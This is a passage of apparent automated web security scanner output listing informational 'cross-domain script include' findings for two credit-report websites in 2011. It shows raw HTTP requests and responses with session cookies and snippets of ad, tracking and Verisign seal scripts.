Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login+Default+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+ForgotLogin; LastVisitDate=4/24/2011 2:07:00 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=fzc2rq45eej5dvivvydhfhiw; path=/
Set-Cookie: MachineName=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:53:17 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServercreditchecktotal-web-pool=175197706.22559.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:53:17 GMT
ETag: "pv0980c4974a7157fef18798d6c941f46d"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70584.RA0.G11456.U8D873154].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 9729

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...
<!-- Advertiser 'ConsumerInfo.com Inc.', Include user in segment 'FCR Site Retargeting LP 042310' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://ads.bluelithium.com/pixel?adv=76801&code=RT&t=1" type="text/javascript"></script>
...[SNIP]...

24.214. http://www.creditchecktotal.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.aspx?sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=x4zbvabzgzdycrflbd4d0v45; path=/
Set-Cookie: MachineName=IRC-P2WEB-10; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:44:32 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=14de7c2848a84999b4ce3923077a0e89; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServercreditchecktotal-web-pool=175001098.22559.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:44:32 GMT
ETag: "pvfeb653d6c4d0585e8fe51aef370bb345"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70584.RA0.G11456.U39967030].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 8633

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...
<div id="Verisign"><script src=https://seal.verisign.com/getseal?host_name=www.creditchecktotal.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

24.215. https://www.creditchecktotal.com/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Message.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Message.aspx?PageTypeID=SessionTimeOut HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd+Order1+s_code.axd; LastVisitDate=4/24/2011 5:39:44 PM; mbox=session#1303691685768-21127#1303693858|PC#1303691685768-21127.17#1304901598|check#true#1303692058; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20s_lv%3D1303691998116%7C1398299998116%3B%20s_lv_s%3DFirst%2520Visit%7C1303693798116%3B%20sc_dl%3D1%7C1303693798353%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.creditchecktotal.com%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DX2THZ%2526SiteVersionID%253D752%2526SiteID%253D100244%2526sc%253D669023%2526bcd%253DEYypxrx2%7C1303693798375%3B%20gpv_PN%3D100244%253Aorder1.aspx%7C1303693798416%3B; s_sess=%20ttc%3D1303691986229%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20s_cc%3Dtrue%3B%20sc_cp_channel%3D0%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=Order1+Error+Order1+Error+Order1+Message?PageTypeID=SessionTimeOut; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 6:36:24 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:36:24 GMT
ETag: "pv0d6f85543721bcb1e56684a924a43550"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UD1BD9B5].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 11103

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...
oubleclick.net/adi/N3973.CreditCheckTotal/B3810933.10;sz=340x140;ord=[timestamp]?" WIDTH=340 HEIGHT=140 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N3973.CreditCheckTotal/B3810933.10;abr=!ie;sz=340x140;ord=[timestamp]?">
</SCRIPT>
...[SNIP]...
oubleclick.net/adi/N3973.CreditCheckTotal/B3810933.11;sz=340x140;ord=[timestamp]?" WIDTH=340 HEIGHT=140 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N3973.CreditCheckTotal/B3810933.11;abr=!ie;sz=340x140;ord=[timestamp]?">
</SCRIPT>
...[SNIP]...
oubleclick.net/adi/N3973.CreditCheckTotal/B3810933.12;sz=340x140;ord=[timestamp]?" WIDTH=340 HEIGHT=140 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N3973.CreditCheckTotal/B3810933.12;abr=!ie;sz=340x140;ord=[timestamp]?">
</SCRIPT>
...[SNIP]...
oubleclick.net/adi/N3973.CreditCheckTotal/B3810933.13;sz=340x140;ord=[timestamp]?" WIDTH=340 HEIGHT=140 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N3973.CreditCheckTotal/B3810933.13;abr=!ie;sz=340x140;ord=[timestamp]?">
</SCRIPT>
...[SNIP]...

24.216. https://www.creditchecktotal.com/Order1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Order1.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2 HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=669023&bcd=EYypxrx2&mkwid=sEYypxrx2&pcrid=7154421312&kwid=credit%20monitoring
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd; LastVisitDate=4/24/2011 5:34:32 PM; mbox=check#true#1303691746|session#1303691685768-21127#1303693546|PC#1303691685768-21127.17#1304901288; s_pers=%20s_lv%3D1303691693010%7C1398299693010%3B%20s_lv_s%3DFirst%2520Visit%7C1303693493010%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20sc_dl%3D1%7C1303693786444%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditchecktotal.com%252Fdefault.aspx%253Fsc%253D669023%2526bcd%253DEYypxrx2%2526mkwid%253DsEYypxrx2%2526pcrid%253D7154421312%2526kwid%253Dcredit%252520monitoring%7C1303693786452%3B%20gpv_PN%3D100244%253Adefault.aspx%7C1303693786456%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691986229%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20SC_LINKS%3D100244%253Adefault.aspx%255E%255E%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E100244%253Adefault.aspx%2520%257C%2520%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditchecktotal.com%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DX2THZ%25252526SiteVersionID%2525253D752%25252526SiteID%2525253D100244_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: MachineName=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=Order1; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 6:29:14 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:29:15 GMT
ETag: "pv34a726d0b6fba38b350738c48c05f169"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UA22DB830].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 26962

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...
<br/>
                                           <script src=https://seal.verisign.com/getseal?host_name=www.creditchecktotal.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
<!-- Advertiser 'ConsumerInfo.com Inc.', Include user in segment 'FCR Site Retargeting OP1 042310' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="https://ad.yieldmanager.com/pixel?id=756482&t=1" type="text/javascript"></script>
...[SNIP]...

24.217. http://www.creditreport.com/dni/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=dtlx5xigzesuxs45sncgr0a2; path=/
Set-Cookie: MachineName=IRC-P2WEB-46; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: OriginalReferrer=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=default; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:54:43 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavFlowID=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=d8dcfc475bed4dc18fed24f42706ace5; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: BIGipServercreditreport-web-pool=177360394.39455.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:54:43 GMT
ETag: "pveaedd7f407396a03b0b796d1384394a7"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.UEC7B40B0].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 13074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>
           Credit Report and Credit History | Credit Rep
...[SNIP]...
<li id="verisign"><script src=https://seal.verisign.com/getseal?host_name=www.creditreport.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

24.218. https://www.creditreport.com/dni/Order1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=Order1; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 6:28:17 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavFlowID=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=77731daa732e49aea233d47cad936667; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:28:17 GMT
ETag: "pvdcf78c1ce3f3db158411db27325dde06"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.UC0B2A2EA].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 31547

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           CreditReport.com | Credit Report and Credit Score Online by Expe
...[SNIP]...
<div id="verisign"><script src=https://seal.verisign.com/getseal?host_name=www.creditreport.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

24.219. https://www.creditreport.com/dni/time-out.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /dni/time-out.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dni/time-out.aspx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox=session#1303691695619-486775#1303693798|PC#1303691695619-486775.17#1304901538|check#true#1303691998; mbox-experianuk=session#1303691695624-816974#1303693799|check#true#1303691998; mbox-experian=session#1303691695628-869024#1303693799|check#true#1303691999; mbox-protectmyidcom=session#1303691695631-207802#1303693799|check#true#1303691999; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20s_lv%3D1303691939108%7C1398299939108%3B%20s_lv_s%3DFirst%2520Visit%7C1303693739108%3B%20sc_dl%3D1%7C1303693739214%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.creditreport.com%252Fdni%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DC2TDM%2526SiteVersionID%253D967%2526SiteID%253D100332%2526sc%253D671917%2526bcd%253Dcomptst%7C1303693739223%3B%20gpv_PN%3D100332%253Adni%253Aorder1.aspx%7C1303693739231%3B; s_sess=%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20s_cc%3Dtrue%3B%20sc_cp_channel%3D0%3B%20sc_cp_paid%3D0%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
